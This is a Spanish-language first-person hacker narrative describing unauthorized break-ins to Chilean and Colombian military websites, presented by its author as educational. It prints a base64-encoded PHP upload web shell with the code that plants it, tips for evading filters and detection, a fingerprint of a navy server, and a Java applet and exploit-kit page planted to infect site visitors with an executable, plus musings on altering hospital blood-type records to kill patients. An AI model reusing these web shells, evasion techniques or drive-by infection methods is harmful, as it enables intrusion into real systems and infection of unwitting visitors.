Introduccin :

Esta es la investigacin de casi 1 ao con esfuerzos y mucha lectura, esta era la conferencia planeada para mostrar en el Campus Party pero desafortunadamente no soy de la White hat farandulera que van a exponer sus camisetas estampadas, sus porttiles o sus libros para quitarle el dinerito a los nios que los alaban, as que ser para una prxima oportunidad, pasado esto creo que es hora de publicar el paper, de antemano pido excusas,primero por si encuentran errores de ortografa o redundancia en prrafos espero entiendan que est escrito tal cual pensaba. Tambin a las personas que se sientan atacadas o vulneradas tanto de manera verbal como de manera tecnolgica soy consciente que el texto es un poco fuerte y que puede herir susceptibilidades, solo busco mostrar una realidad y evitar un posible ataque de estos a gran escala. Un pensamiento Obscuro Prefacio Bueno, no es muy comn que escriba este tipo de documentos ya que creo que pueden ser malinterpretados, juzgados o usados por scriptkidies para provocar miedo u admiracin en personas del comn, los datos imgenes y accesos puestos en el siguiente documento fueron producto de un trabajo basado en la investigacin que en ningn momento busca provocar o incitar el caos social, espionaje gubernamental o lucro econmico. La intencin de este texto es mostrar lo que para m, por la investigacin y las pruebas ya realizadas pueden llegar a pasar de un simple owned a un ataque SCADA de gran impacto. Lo escribo porque actualmente veo como algo muy comn que cualquiera acceda a un sistema. Vamos que a sistema me refiero con "objeto compuesto cuyos componentes se relacionan con al menos algn otro componente; puede ser material o conceptual, en este caso hablaremos de un sistema informtico ms especficamente me refiero a una de las cartas de presentacin electrnica ms grandes que existe en un estado, empresa, negocio, foro etc... El texto ser escrito como una narracin de unos meses de trabajo .

Mi investigacin comenz una maana despus de que mi seora e hija salieron como es comn a su trabajo y colegio, ese da me dispona a realizar un informe de vulnerabilidades de una de las empresas a las que auditaba en ese momento, concentrado en el trabajo decid descansar un poco; as que me fume un cigarro y pens en lo que me encanta, un rato de hacking, mir zone-h y observ que dos pases de Latinoamrica eran reincidentes en los defacements, eso s aclaro : la mayora de lo que haba era basura, a basura me refiero con hackeos a panaderas,fruteras,tiendas de mascotas etc. O sea nada relevante o importante a mi opinin, nada que sea un logro. As que me dediqu a mirar los dos pases escogidos: " Chile y Colombia". Pens que por lo menos en Colombia de las cosas ms importantes que existen son las fuerzas militares me decid a comenzar por all, mirando y mirando sus sitios el manejo de los mismos y recolectando la informacin que el gran amigo google permite. Una vez reconocido el objetivo pas a Chile mi idea era mirar que pas sera ms vulnerable teniendo en cuenta que en ambos por lo que investigu, la milicia es importante tanto as que los yanquis reconocen a ambos ejrcitos como los ms profesionales y equipados del continente; cosa que me motiv an ms entonces organic mis objetivos de la siguiente manera:

Fuerzas militares de Chile www.ejercito.cl www.armada.cl www.escuelamilitar.cl www.mhm.cl www.escueladesuboficiales.cl www.escueladeaviacion.c

Fuerzas militares de Colombia www.ejercito.mil.co www.reclutamiento.mil.co www.circulo.mil.co www.armada.mil.co www.fac.mil.co www.esdegue.mil.co

Lgicamente estaba consciente de que no era permitido hacer intrusiones y menos de este tipo, ya no son panaderas, ni bizcocheras tampoco un poltico o un cantante . Era muy consciente de que eran las fuerzas militares y que hacer una intrusin all no solo sera algo excitante si no ilegal pero Hombre es algo educativo! as que tom la decisin. Sabiendo esto tome la Credit Card de mi mujer, compr una vpn y empec con mucho cuidado la tarea de mirar a que pas podra ingresar y alimentar ese deseo de estar donde muchos quisieran, empec por Colombia, investigu y volv e investigu de nuevo, muchos decan que la persona que cuida las pginas del estado colombiano es uno de los "hackers" de dragonjar xD s seores, el foro del gordito bonachn que tanto da de qu hablar hehe, en fin eso no me interes y segu, empec por mirar con qu estaba programado el site para variar php y con vulnerabilidades tontas que me sorprendieron pero que aun as, segua con las ganas de ver que encontrara. Despus de horas y horas y de hacer una blind que no termin siendo til para nada porque tena vulnerabilidades an ms tontas, habl con unos buenos amigos y les cont, uno de ellos se sent conmigo y empezamos a mirar (por cuestiones de seguridad no dir el Nick ), no es una mala oportunidad para repetir que de corazn espero que el texto sea ms una ayuda para los afectados y no una bsqueda o critica de alguna de las partes, ya que lo que menos deseo es tener problemas y les recuerdo que es netamente educativo. Una vez aclarada la cuestin sigamos, aquellos amigos mos lograron el acceso y reportaron su intrusin en zone-h pero a m me sorprendi y pasaron unos meses en los que como todos me tocaba trabajar para poder vivir; los que tienen familia me entienden.

As que luego de unos meses volv a retomar mi investigacin, Qu pas era ms vulnerable? pero ahora tena una idea ms, ahora imaginaba que impacto traera no solo un owned and exposed si no unir ramas del hacking como el malware y la intrusin; un arte mortal que puede llevar a poner en problemas un pas, o por lo menos creo que los pone a pensar . Teniendo an ms ganas comenc de nuevo, omitir muchas de las cosas para no extenderme, pero esta vez empec con Chile , llegado despus de descansar me senta ms poderoso jeje "es un decir", as que hice el gathering correspondiente y de nuevo me enfrentaba a un php con mysql pero con algo que hasta ahora no vea, se poda manipular aparte de qwerys a la data base por post, poda enviar por un formulario la Shell as que despus de varios intentos termin subiendo esto :

$c=base64_decode("PD9waHANCmlmKGlzc2V0KCRfUE9TVFsnU3VibWl0J10pK XsNCiAgICAkZmlsZWRpciA9ICIiOyANCiAgICAkbWF4ZmlsZSA9ICcyMDAwMDA wJzsNCg0KICAgICR1c2VyZmlsZV9uYW1lID0gJF9GSUxFU1snaW1hZ2UnXVsnb mFtZSddOw0KICAgICR1c2VyZmlsZV90bXAgPSAkX0ZJTEVTWydpbWFnZSddW yd0bXBfbmFtZSddOw0KICAgIGlmIChpc3NldCgkX0ZJTEVTWydpbWFnZSddWyd uYW1lJ10pKSB7DQogICAgICAgICRhYm9kID0gJGZpbGVkaXIuJHVzZXJmaWxlX 25hbWU7DQogICAgICAgIEBtb3ZlX3VwbG9hZGVkX2ZpbGUoJHVzZXJmaWxlX3 RtcCwgJGFib2QpOw0KICANCmVjaG8iPGNlbnRlcj48Yj5Eb25lID09PiAkdXNlcmZ pbGVfbmFtZTwvYj48L2NlbnRlcj4iOw0KfQ0KfQ0KZWxzZXsNCmVjaG8nDQo8Zm 9ybSBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9yb S1kYXRhIj48aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iaW1hZ2UiPjxpbnB1dCB0eX BlPSJTdWJtaXQiIG5hbWU9IlN1Ym1pdCIgdmFsdWU9IlN1Ym1pdCI+PC9mb3JtPi c7DQp9DQo/PiA="); $variable = fopen('updir/shell.php','w'); fwrite($variable, $c); fclose($variable);

Para los que no entiendan esto es un simple cdigo de upload en php y con encode en base 64 para saltar los filtros se pueden bypasear con strings largas o algo de entropa; tambin funcionaria si es que hubiese subido la Shell directamente se podra utilizar Shell sin usar funciones eval(), system() y dems para evitar que fuese detectada.

Imagen de la Shell Up

(Pdta.: Despus de un tiempo vi que un 1=1 tambin hackearia el site xD )

Entre otras vulnerabilidades sus backups, aunque esta no sirve de mucho ya que es una db vieja, pero si es lo primero que encuentras sube el nimo creme. http://www.ejercito.cl/noc@192.168.0.124 En fin logre la Shell up, ahora con fuerza me ira a Colombia y una vez ms encontr vulnerabilidades varias en la pgina, todava con la existencia de la blind, pero al igual que la vez pasada no sirvi de mucho ya que los creadores (micrositios) de su CMS para m son unos desordenados totales "aqu pueden investigar en google y era la empresa que cobraba 700 millones colombianos por un sitio increble no!!!?. Era tan as que ni los logins eran claros, as que aun con ms mal genio porque hombre ingresar y no poder hacer nada y no por que no sepas si no porque hasta para eso est mal programado el sitio da mucha rabia, as que seores no me lo creern pero el mismo error del ejrcito pasado pasaba en este poda manipular un post y enviar el cdigo. Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8i Logr la Shell up! Los sistemas son los mismos, mismo cms +/- 73 dominios dependiendo de uno principal, si modifica 1 modifica los ms o menos 73 dominios que estn en la misma ip, ahora tena la Shell en 1 solo dominio y con la esperanza de hacer un link simblico para poder leer las otras cuentas, estaba en un error ya que la Shell se replic en los 72 dominios ms, cosa que no esper y facilitaba el trabajo. El print de la siguiente Shell es del server Linux donde est lo que es la armada de ese pas, es la que ms me ha gustado lgicamente mismo cms, mismo bug adems de ser Linux as que me dara mayor facilidad de manejo y una terminal ms rpida para lo que planeaba. Server system : Linux tifonbackup.armada.mil.co 2.6.32-220.el6.x86_64 #1 SMP Tue Dec 6 6 19:48:22 GMT 2011 x86_641011

Server software : Apache/2.2.15 (CentOS) Current User Is : apache(48) , Group : (48) Current Dir is : /home/arc_pqr/ 0755 Open base dir : OFF Safe mode is : OFF Safe mode GID is : OFF

Considero que los servers colombianos tienen mucha ms informacin y son ms sensibles a un espionaje gubernamental por eso decid no poner ni dar los accesos en bandeja, aqu me entendern es un pas con mucha violencia y corrupcin, entonces lastimosamente siento que no debo profundizar es este por que de seguro termino metido en un lo. Una vez en este punto con los que significaba tener acceso a dos ejrcitos de pases distintos, teniendo en las manos los host que son importantes para las personas que nos protegen; adentr en algo an ms interesante, en mi investigacin observ que las personas que ms visitan ese tipo de pginas son personas generalmente del gobierno, esto significaba que podra controlar lo que vean o descargaban, esto manejado con algo de conocimiento preparacin y un pensamiento obscuro sera fatal. Decid primero poner un applet <applet name="JAVARUN" width='1' height='1' code='servidor.Private.class' archive='servidor.jar'> <param name="link" value="http://127.0.0.1/server.exe"> </applet> Pero la respuesta fue esperada aunque utilizaba un applet no detectado, muchos ejecutaban pero no era suficiente para mi investigacin, me convenc de poner un exploit kit, eso significaba que cualquiera que entrara a la web estara infectado, pdfo tena un problema... toda mquina que utilizara java menos la ltima versin sera infectado, es aqu donde llegan los "hackers" y dicen uso Linux o Mac, seores tambin estudi las opciones por semanas de infectar con java esos OS y el resultado: s se puede. Todos sabemos que es posible. Demorado pero posible.

<Code exploit pack html> <html><head></head><body><applet archive=".jar" code="cve1723.Sabrixxx.class" width="1" height="1"><param name="data" value="4d5a90000300000004000000ffff0000b80000000000000040000000000000 0000000000000000000000000000000000000000000000000000000000 b80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616 e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a 24000000000000007de6a3d93987cd8a3987cd8a3987cd8aba9bc38a3887cd8a50 98c48a3f87cd8ad098c08a3887cd8a526963683987cd8a00000000 00000000504500004c010300f2f20d500000000000000000e0000f010b010600003 002000020000000000000cc130000001000000040020000004000 00100000001000000- sigue mucho ms del exploit kit as q informacin en google.com /><param name="host" value="http://localhost/server.exe"/><param name="puerto"> </ Code exploit pack html>

<code .jar> public class Sikerimlenibneler implements PrivilegedExceptionAction { class Benokorovaro extends Thread { InputStream is; OutputStream os; Benokorovaro(InputStream in, OutputStream out) { // compiled code } Tiene mucho ms, pero para mayor informacin google.com </code .jar> Ahora ya no solo era una intrusin ya no solo eran los dos sitios de nuestros protectores, sino que tenamos mquinas no muchas como la botnet lograra y sin tanta basura, tenamos gente importante accesos importantes servidores importantes, es aqu donde termino es aqu donde dejo a la imaginacin obscura, donde les doy mi prrafo de despedida y donde escribo segn mi investigacin la consecuencia que traera en manos no prudentes un ataque ejecutado de esta forma que expongo. Imagen cliente pasados 1 minuto 10 seg 8 personas en un minuto algo realmente bueno significaba que funcionaba lo planeado!

Considero altamente crtico el problema no slo porque sean pginas militares, no slo porque tengamos control de los usuarios , no slo porque controlemos su trfico, sino porque parece un problema de seguridad nacional, aqu es donde entra la mente ms obscura, imagnate que el atacante haga acusaciones un poco peligrosas a otro gobierno, O que se le de manejo a los mails que se tiene acceso en el server, o que se suplante identidad y se den rrdenes, Qu crees que podra llegar a pasar? teniendo control de usuarios de este tipo, Qu tal si tuviramos el acceso a un hospital? Qu tal si en el server web esta la intranet o que podamos saltar de nodo y manejar a nuestro antojo sus servers?, y si las data bases dicen : Nombre Haxor vulnerable Rh etc. A+ Qu tal que modificaras en el sistema el RH y multiplicaras todos los signos por menos teniendo como resultado (+*+= + , +*- = - , -*+=- , -*-=+) la respuesta es fcil todo lo que sea multiplicado por menos alterara el Rh en El momento que el paciente tenga un accidente necesite sangre y miren su historial clnico, el sistema modificado creara una muerte que en masa seria masacre no crees que sera un ataque SCADA de alto impacto a partir de un simple owned? Ya los papeles estn dejando de usarse, por lo cual hay que invertir en seguridad esto es slo un proyecto de investigacin y educativo para evitar ese tipo de ataques existen humanos con maldad y no la maldad investigativa si no la maldad lucrativa as que espero y sueo que estos dos pases reaccionen y que vean que la educacin no es un negocio sino una necesidad. Despedida : Despus de decidir hacer una locura llamada investigacin, donde los amigos del oriente, occidente, sur, norte me compartieron sus conocimientos y a ellos : indouhska, r0073r, angel silenth, ksha, xianuro, dedalo, pilo, aku, nav, neto, maztor, joss, jxe, oxoc, treinord, y muchisimos mas con los que hemos cruzado unas palabras, les agradezco y es aqu donde aprend que los casi 10 aos que llevo sentado reportando fallas estudiando, aprendiendo cayndome luchando esta vida, nunca sern suficientes ya que siempre as sea mnimo cada da se aprende algo de la persona que menos esperas. Te dejo muy en claro que el hacking es una cultura un estilo de vida un pensamiento, no una moda... (D4NB4R) " apellido direccin cd 34 - 87 telfono 45366

Importante : Es completamente educacional recurdelo sin embargo sin el pensamiento obscuro no hay defensa fuerte @D4NB4R .